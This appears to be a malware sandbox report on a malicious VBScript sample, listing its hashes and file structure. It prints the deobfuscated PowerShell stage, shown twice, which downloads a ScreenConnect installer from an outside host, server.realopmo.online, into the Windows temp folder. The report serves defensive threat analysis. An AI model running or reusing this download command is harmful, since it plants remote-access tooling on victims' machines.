Malicious
Malicious

ab41b8aae23139a120bd150b480f52d9

VBScript
|
MD5: ab41b8aae23139a120bd150b480f52d9
|
Size: 1.21 KB
|
text/vbscript

Infection Chain
Summary by MalvaGPT
Characteristics
Hash
 Hash Value
MD5
ab41b8aae23139a120bd150b480f52d9
Sha1
9f05dc3e22b094e24826b6b8397e8337eaac72a1
Sha256
f50bb85de2859695c5a82a061f9bb4ca53a96df654b3555f67bcacb7150d53fc
Sha384
bca4a122fae2619412ed271adec811004cf1cacea1d22154aa65e761d6412f2527b1a1ac7b9ffa4c50a6184812e0425d
Sha512
a1d1454a64e35250e503794358852a33b6d80ed060fddf4ae7826a8fefa96d1a3d30f1c2ed14ee8c293bf16e2aa5b0bae7e41d0f7811194fe3500ff5c4cbd7d0
SSDeep
24:Pb7z/Gc+YDLUd0s3MfhK6KJevZROMaARkIIMPTQ/FdW2AwU/G:j/1DL48k6KJevZHREMc/FdW2AXO
TLSH
D821241FFA4BE2213565A213C3AA1D1DC748126B57008851BBA87508AB24734EBB92D7
File Structure
ab41b8aae23139a120bd150b480f52d9
Malicious
ab41b8aae23139a120bd150b480f52d9.deobfuscated.vbs
Malicious
[Command #0]
Malicious
[PowerShell Command]
Malicious
[Deobfuscated PS]
Malicious
Artefacts
Name
 Value
URLs in VB Code - #1

http://server.realopmo.online/Bin/ScreenConnect.ClientSetup.msi?e=Access&y=Guest
Deobfuscated PowerShell

try { (New-Object "Net.WebClient")."DownloadFile"("http://server.realopmo.online/Bin/ScreenConnect.ClientSetup.msi?e=Access&y=Guest", "C:\Windows\Temp\ScreenConnect.ClientSetup.msi") exit 0 } catch { exit 1 }

ab41b8aae23139a120bd150b480f52d9 (1.21 KB)
File Structure
ab41b8aae23139a120bd150b480f52d9
Malicious
ab41b8aae23139a120bd150b480f52d9.deobfuscated.vbs
Malicious
[Command #0]
Malicious
[PowerShell Command]
Malicious
[Deobfuscated PS]
Malicious
Characteristics
No malware configuration were found at this point.
Artefacts
Name
 Value Location
URLs in VB Code - #1

http://server.realopmo.online/Bin/ScreenConnect.ClientSetup.msi?e=Access&y=Guest

ab41b8aae23139a120bd150b480f52d9
Deobfuscated PowerShell

try { (New-Object "Net.WebClient")."DownloadFile"("http://server.realopmo.online/Bin/ScreenConnect.ClientSetup.msi?e=Access&y=Guest", "C:\Windows\Temp\ScreenConnect.ClientSetup.msi") exit 0 } catch { exit 1 }

Malicious

ab41b8aae23139a120bd150b480f52d9 > ab41b8aae23139a120bd150b480f52d9.deobfuscated.vbs > [Command #0] > [PowerShell Command]
You must be signed in to post a comment.
An error has occurred. This application may no longer respond until reloaded. Reload 🗙